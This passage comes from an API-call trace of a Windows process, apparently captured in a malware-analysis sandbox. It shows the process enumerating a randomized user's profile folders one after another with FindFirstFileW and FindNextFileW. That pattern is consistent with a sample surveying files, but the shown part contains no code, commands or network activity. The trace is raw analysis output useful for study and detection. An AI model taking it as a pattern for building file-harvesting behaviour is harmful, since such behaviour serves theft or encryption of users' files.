HALPmcxz\\My Documents\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 0xffffffff [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b453d0 | out: hHeap=0xcd0000) returned 1 [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45438 | out: hHeap=0xcd0000) returned 1 [0165.824] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.824] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0165.824] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.824] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.824] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.824] PathFindFileNameW (pszPath="") returned="" [0165.824] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 0xffffffff [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.825] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.825] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0165.825] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.825] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.825] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.825] PathFindFileNameW (pszPath="") returned="" [0165.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45438 | out: hHeap=0xcd0000) returned 1 [0165.825] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.825] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2555e30, ftCreationTime.dwHighDateTime=0x1d5e5ba, ftLastAccessTime.dwLowDateTime=0x18dafeb0, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0x18dafeb0, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="612n", cAlternateFileName="")) returned 1 [0165.825] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.825] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc56cc5c0, ftCreationTime.dwHighDateTime=0x1d5e6ca, ftLastAccessTime.dwLowDateTime=0xa3742920, ftLastAccessTime.dwHighDateTime=0x1d5d98e, ftLastWriteTime.dwLowDateTime=0xa3742920, ftLastWriteTime.dwHighDateTime=0x1d5d98e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="js4wnFUoxs42X9Y0mylB", cAlternateFileName="JS4WNF~1")) returned 1 [0165.825] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37389b0, ftCreationTime.dwHighDateTime=0x1d5e1c8, ftLastAccessTime.dwLowDateTime=0x3e0538e0, ftLastAccessTime.dwHighDateTime=0x1d5e57d, ftLastWriteTime.dwLowDateTime=0x3e0538e0, ftLastWriteTime.dwHighDateTime=0x1d5e57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ynvUi8OA0E 4g2YjdS", cAlternateFileName="YNVUI8~1")) returned 1 [0165.825] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 1 [0165.825] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0 [0165.825] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.825] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.826] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0165.826] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.826] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.826] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.826] PathFindFileNameW (pszPath="") returned="" [0165.826] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0xffffffff [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b453d0 | out: hHeap=0xcd0000) returned 1 [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45438 | out: hHeap=0xcd0000) returned 1 [0165.826] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.826] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0165.826] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.826] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.826] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.826] PathFindFileNameW (pszPath="") returned="" [0165.826] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0xffffffff [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.827] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.827] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0165.827] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.827] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.827] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.827] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.827] PathFindFileNameW (pszPath="") returned="" [0165.827] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.827] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b453d0 | out: hHeap=0xcd0000) returned 1 [0165.827] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.827] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.827] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0165.827] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.827] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.827] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45438 | out: hHeap=0xcd0000) returned 1 [0165.827] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.828] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0165.828] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.828] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.828] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.828] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.828] PathFindFileNameW (pszPath="") returned="" [0165.828] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.828] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45438 | out: hHeap=0xcd0000) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0165.828] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.828] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.828] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.828] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.828] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0165.828] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.828] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.828] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.829] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.829] PathFindFileNameW (pszPath="") returned="" [0165.829] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0165.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.829] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0165.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.829] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.829] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.829] PathFindFileNameW (pszPath="") returned="" [0165.829] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0165.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b453d0 | out: hHeap=0xcd0000) returned 1 [0165.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45438 | out: hHeap=0xcd0000) returned 1 [0165.829] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0165.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.830] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.830] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.830] PathFindFileNameW (pszPath="") returned="" [0165.830] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0165.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b453d0 | out: hHeap=0xcd0000) returned 1 [0165.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45438 | out: hHeap=0xcd0000) returned 1 [0165.830] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.830] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0165.830] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.830] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.830] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.830] PathFindFileNameW (pszPath="") returned="" [0165.830] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98d5b80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, 